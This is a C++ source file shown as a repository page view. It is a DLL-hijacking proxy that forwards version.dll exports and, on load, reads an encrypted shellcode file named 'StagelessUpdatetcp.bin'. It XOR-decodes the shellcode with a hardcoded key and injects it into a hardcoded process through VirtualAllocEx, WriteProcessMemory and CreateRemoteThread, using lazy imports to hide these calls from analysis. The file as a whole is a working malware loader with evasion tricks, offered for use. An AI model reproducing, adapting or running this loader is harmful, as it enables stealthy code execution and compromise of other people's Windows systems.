-
Notifications
You must be signed in to change notification settings - Fork 0
/
dllmain.cpp
87 lines (69 loc) · 3.2 KB
/
dllmain.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#include "lazy.hpp"
#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(linker, "/export:GetFileVersionInfoA=ver.GetFileVersionInfoA,@1")
#pragma comment(linker, "/export:GetFileVersionInfoByHandle=ver.GetFileVersionInfoByHandle,@2")
#pragma comment(linker, "/export:GetFileVersionInfoExA=ver.GetFileVersionInfoExA,@3")
#pragma comment(linker, "/export:GetFileVersionInfoExW=ver.GetFileVersionInfoExW,@4")
#pragma comment(linker, "/export:GetFileVersionInfoSizeA=ver.GetFileVersionInfoSizeA,@5")
#pragma comment(linker, "/export:GetFileVersionInfoSizeExA=ver.GetFileVersionInfoSizeExA,@6")
#pragma comment(linker, "/export:GetFileVersionInfoSizeExW=ver.GetFileVersionInfoSizeExW,@7")
#pragma comment(linker, "/export:GetFileVersionInfoSizeW=ver.GetFileVersionInfoSizeW,@8")
#pragma comment(linker, "/export:GetFileVersionInfoW=ver.GetFileVersionInfoW,@9")
#pragma comment(linker, "/export:VerFindFileA=ver.VerFindFileA,@10")
#pragma comment(linker, "/export:VerFindFileW=ver.VerFindFileW,@11")
#pragma comment(linker, "/export:VerInstallFileA=ver.VerInstallFileA,@12")
#pragma comment(linker, "/export:VerInstallFileW=ver.VerInstallFileW,@13")
#pragma comment(linker, "/export:VerLanguageNameA=ver.VerLanguageNameA,@14")
#pragma comment(linker, "/export:VerLanguageNameW=ver.VerLanguageNameW,@15")
#pragma comment(linker, "/export:VerQueryValueA=ver.VerQueryValueA,@16")
#pragma comment(linker, "/export:VerQueryValueW=ver.VerQueryValueW,@17")
void exclusiveor(char* data, size_t data_len, char* key, size_t key_len) {
int j;
j = 0;
for (int i = 0; i < data_len; i++) {
if (j == key_len - 1) j = 0;
data[i] = data[i] ^ key[j];
j++;
}
}
char key[] = "kvUDb2PS0s8YZXJ4yd1gxzI5IZ6r3O2j";
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD reason,
LPVOID lpReserved
)
{
HANDLE threadHandle;
switch (reason)
{
case DLL_PROCESS_ATTACH:
FILE* fp;
size_t shellcodeSize;
unsigned char* shellcode;
fp = fopen("StagelessUpdatetcp.bin", "rb");
fseek(fp, 0, SEEK_END);
shellcodeSize = ftell(fp);
fseek(fp, 0, SEEK_SET);
shellcode = (unsigned char*)malloc(shellcodeSize);
fread(shellcode, shellcodeSize, 1, fp);
exclusiveor((char*)shellcode, shellcodeSize, key, sizeof(key));
HANDLE processHandle;
HANDLE remoteThread;
PVOID remoteBuffer;
processHandle = LI_FN(OpenProcess)(PROCESS_ALL_ACCESS, FALSE, DWORD(3420)); //Create proc handle
remoteBuffer = LI_FN(VirtualAllocEx)(processHandle, nullptr, shellcodeSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
LI_FN(WriteProcessMemory)(processHandle, remoteBuffer, shellcode, shellcodeSize, nullptr); //Lazy function
remoteThread = LI_FN(CreateRemoteThread)(processHandle, nullptr, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, nullptr, 0, nullptr);
CloseHandle(processHandle);
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}